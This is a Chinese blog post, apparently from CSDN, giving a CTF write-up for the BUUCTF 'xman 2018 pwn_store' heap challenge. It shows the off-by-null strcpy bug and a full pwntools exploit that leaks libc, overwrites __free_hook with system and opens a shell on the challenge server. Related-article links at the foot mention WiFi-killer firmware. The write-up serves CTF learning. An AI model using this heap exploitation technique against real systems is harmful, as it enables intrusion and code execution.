[BUUCTF-pwn] xman冬令营选拔赛_2018_pwn_store

最新推荐文章于 2022-11-22 16:57:33 发布
最新推荐文章于 2022-11-22 16:57:33 发布
阅读量213 收藏
点赞数
分类专栏: CTF pwn 文章标签: python c语言 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121565103
版权

no坑no题。这题的坑太害人

看上去是个简单的堆里,edit name时用strcpy有off_by_null漏洞,只需要作ABC t先释放A通过B修改c的pre_inuse=0,再释放C得到合并。再申请到B,释放B,再写入free_hook就行了

漏洞点:

        strcpy复制时会在尾部带\0

unsigned __int64 m2edit()
{
  int v0; // eax
  unsigned int v2; // [rsp+Ch] [rbp-44h] BYREF
  char s[8]; // [rsp+10h] [rbp-40h] BYREF
  char v4[48]; // [rsp+18h] [rbp-38h] BYREF
  unsigned __int64 v5; // [rsp+48h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(s, 0, 0x30uLL);
  puts("Which one?");
  __isoc99_scanf("%u", &v2);
  if ( dword_20203C && v2 <= 0x10 && *((_QWORD *)&unk_202048 + 3 * v2) )
  {
    printf("New name:");
    readn((__int64)v4, 40);
    strcpy(*((char **)&unk_202048 + 3 * v2), v4);// off_by_null
    printf("New goods:");

步骤:

  1. 由于有size限制不能直接释放到unsort所有,先建12个块(大概用到10个)
  2. 释放7个填满tcache,再释放得到unsort
  3. 建1字节块,写1个字节得到libc(没有show,但输入后会回显)
  4. 这时候可能edit1.name利用off_by_null修改3的pre_inuse。但写满40后会有个垃圾字节。经过反复测试发现这个垃圾是上一次建块的size。
  5. 选建个100,然后通过ABC方法,向前合并,得到重叠tcache_attack
from pwn import *

local = 0

def connect():
    global p,libc_elf,one,libc_start_main_ret
    
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 28353) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

elf = ELF('./pwn')
context.arch = 'amd64'

menu = b">> "
def add(size, msg=b'b\n', name=b'b\n'):
    p.sendlineafter(menu, b'1')
    p.sendafter(b"Order name:", name)
    p.sendlineafter(b"How many:", str(size).encode())
    p.sendafter(b"Goods' name:", msg)

def edit(idx, msg=b'a\n', goods=b'a\n'):
    p.sendlineafter(menu, b'2') 
    p.sendlineafter(b"Which one?", str(idx).encode())
    p.sendafter(b"New name:", msg)
    p.sendafter(b"New goods:", goods)

def free(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Which one?", str(idx).encode())

def pwn():
    context.log_level = 'debug'

    for i in range(12):
        add(0xf8)
    for i in range(7,-1,-1):
        if i == 7:
            add(0x40)
        free(i)

    add(1, msg=b'\xa0')

    p.recvuntil(b'Goods of order[5] :')
    malloc_hook = u64(p.recvline()[:-1].ljust(8, b'\x00')) -0x100 -0x60 -0x10 
    libc_base   = malloc_hook - libc_elf.sym['__malloc_hook']
    free_hook   = libc_base + libc_elf.sym['__free_hook']
    system      = libc_base + libc_elf.sym['system']
    print('libc:', hex(libc_base), hex(malloc_hook))
    
    add(0x100, name=b'A'*0x28)  #0xf8
    edit(1, b'A'*0x28)
    edit(1, b'A'*0x27+b'\n')
    edit(1, b'A'*0x26+b'\n')
    edit(1, b'A'*0x25+b'\n')
    edit(1, b'A'*0x24+b'\n')
    edit(1, b'A'*0x23+b'\n')
    edit(1, b'A'*0x20+ p64(0x240))
    add(0xf8) #2
    add(0xf8) #3
    
    free(10)
    free(11)
    free(3)
    
    #
    add(0x120) #3
    free(0)
    edit(3, goods=b'A'*0xd8 + p64(0x31) + p64(free_hook)+ b'\n')
    add(0x18, name=b'/bin/sh\x00\n') #0
    add(0xf8, name=p64(system)+ b'\n')
    
    free(0)
    #gdb.attach(p)
    #pause()
    
    p.sendline(b'cat /flag')  
    p.interactive()
    
connect()
pwn()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwntools实战CTFpwn
Yale的博客
01-30 2634
Pwntools安装,一条命令就能搞定 pip install --upgrade pwntools 安装完毕后在python环境下只需使用 from pwn import * 即可导入 这会将大量的功能导入到全局命名空间,然后我们就可以直接使用单一的函数进行汇编、反汇编、pack,unpack等操作。 常用的模块有下面几个: asm : 汇编与反汇编,支持x86/x64/arm/mips/pow...
CTF大赛】第五届XMan选拔赛 ezCM Writeup
HBohan的博客
08-12 821
ezCM 直至比赛结束,这道题目都是 0 解题,一方面是因为比赛时间较短,另一方面还是因为这道题目较难,考察了不常见的椭圆曲线算法(ECC),大大增加了对做题者的要求。 题目信息 题目是使用 Golang 来编写的一个 CrackMe 程序,程序内符号没有被去除,所以这篇文章就不会讲解如何恢复 Golang 程序符号,另外 IDA Pro 7.6 已经支持 Golang 程序分析,打开就可以直接恢复被去除的符号信息。 题目要求打开一个 KeyFile ,并且通过读取其文件的内容来注册程序,我们要做的就是通
2022强网拟态pwn-store
z1r0的博客
11-22 710
首先是这个沙箱,64位只有r和w,一开始看的时候很纳闷多了32位的限制,64位还没有o,查了一下才知道这样的seccomp-tools是以64位的检查来检查的,所以上面显示的32位系统调用就是64位的系统调用,所以看一下上面在32位显示的这些实际上是多少。所以思路比较清楚,利用house of apple2控制程序流程,mprotect控制rwx权限,布置shellcode,需要注意的是远程flag文件名需要getdents找一下,找完了之后利用orw即可。chmod对应是0x5a,对应32位是mmap。
Xman2018冬令营选拔赛arm-pwn
Peanuts
01-05 838
arm32-pwn从环境搭建到实战 关于arm的pwn还是比较令人头疼的,首先汇编比较难看懂,其次就是ida反编译出来的东西还会有错误,比如之后要讲的题目中栈的分布就和ida解析出来的完全不一样。那么先来看一看环境的搭建。之前有人发过完整的64的环境搭建,32的环境搭建和实战还是有一些不同的 环境搭建 环境的搭建应该是现在arm题目中比较麻烦的一个点。 安装qemu apt-get in...
第62天:2019Xman冬令营选拔赛部分writeup
S1lenc3的博客
12-31 792
Mobile 直接拖入JEB, 标准的输入和提交。 然后把输入框的值赋给passt和flagt。分别是Long和string 然后判断flagt是否为空,最后调用原生方法check。 啥都不用想,直接解压上IDA。 Arm汇编压根不会,直接看伪代码猜吧。 这三个估计就是调用Factor类的factor方法,参数是passt。 然后继续走到下一个函数。 a5...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
WriteUp – 2018年“华为杯”极客出发XMan冬令营线上CTF选拔赛
weixin_34122810的博客
02-05 396
Mobile 第二题:返老还童(1000pt) 拿到apk之后丢进JEB,发现只有.class,java代码,没有so。整个apk的class文件结构如下: a.a.a com.reverse.daydayup.a com.reverse.daydayup.b com.reverse.daydayup.MainActivity 阅读Ma...
Xman 选拔赛 NoLeak writeup
charlie_heng的专栏
08-09 782
很久没发博客了,就随便写一下吧 想出一道House of Roman的题,然后去找了下类似的题目,记起来选拔赛的时候好像有一道NoLeak,那时候队里面的师傅做了,我就懒得做了,现在回顾了下,发现根本不用house of Roman就能get shell,直接partial write就可以写malloc hook,然后将shell code 写到bss段,跳到bss段get shell 下面...
180107 逆向-Xman移动安全冬令营选拔赛
whklhhhh的博客
01-07 931
1625-5 王子昂 总结《2018年1月7日》 【连续第464天总结】 A. Xman移动安全冬令营选拔赛 B. 搞完领航杯马不停蹄回来搞移动逆向,感谢主办方延长了时间~ 逆向类的题目很有意思(°∀°)ノ 脑洞/杂项类的就……(跪 返老还童 反编译查看java代码,发现调用了一个WebView,加载了包内的check_flag.html 解包拿出来,查看发现存在混淆的js代码
XMAN选拔赛官方Writeup
热门推荐
zsj2102的专栏
07-20 2万+
XMan选拔赛官方Writeup XMan 2017 Baaa [原理] 栈溢出。 [目的] 盲打栈溢出。 [环境] Ubuntu。 [工具] gdb、objdump、python。 [步骤] 拿到题目,发现并没有给二进制,估计是盲打。nc一下,发现返回了一个地址,我们尝试不同大小payload,最后确定下来大约为72位junk加上16位的地址。 exp from
QCTF 2018xman夏令营选拔赛
Xi4or0uji
07-15 2176
小肉鸡太菜了,就只做了三题orz....... x-man-a-face 这题挺简单的,拿到一个图片,看见有个二维码 发现少了两个定位点,用photoshop补全 扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= 然后base32解码就行了 Lottery 这题是弱类型匹配,进...
XMAN
csu_vc的博客
07-17 1334
先从web开始说起吧,因为错过了时间所以在平台关闭之前抓紧时间练了一练,中间请教了几个大佬web第一题——variacover拿到题目,是个源代码 发现这里存在变量覆盖,还有看到两个MD5==,往弱口令方向想,然后 一开始我还不知道为什么,然后搜了一下才懂得 0e后面会被识别成0的10的多少次方,再加上php是弱语言,会自动判断数据类型,所以零=零WEB第二题——urldecode
[WP]第五届XMan选拔赛web
xiongshivigor的博客
08-11 360
第五届XMan选拔赛 本次比赛一共三道web,一道签到题就不用说了,另外两道貌似也都不是很难的题,但是确实水个人平太菜,没都做做出来,还是逐步积累经验吧 easyphp <?php error_reporting(0); highlight_file(__FILE__); class XMAN{ public $class; public $para; public $check; public function __construct() {
Xman资格选拔赛-web
weixin_30709929的博客
07-20 775
variacover 这道题一打开就是源码,主要就是根据源码构造url。其中,它接收的参数只有b,但源码中要获取flag的关键参数是a[0]。parse_str()函数的作用是把查询字符串解析到变量中,于是我们可以通过将a[0]嵌入b的传参中,然后由这个函数再将a[0]提取出来,解析出a[0]后,还需要满足其值是MD5加密后与MD5('QNKCDZO’)的值相等,但加密前的字符串不相等,因为QN...
LLVM pass pwn 入门 (3)
CoLin的pwn小屋
07-19 750
LLVM pass pwn 入门:红帽杯2021-simpleVM题解
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值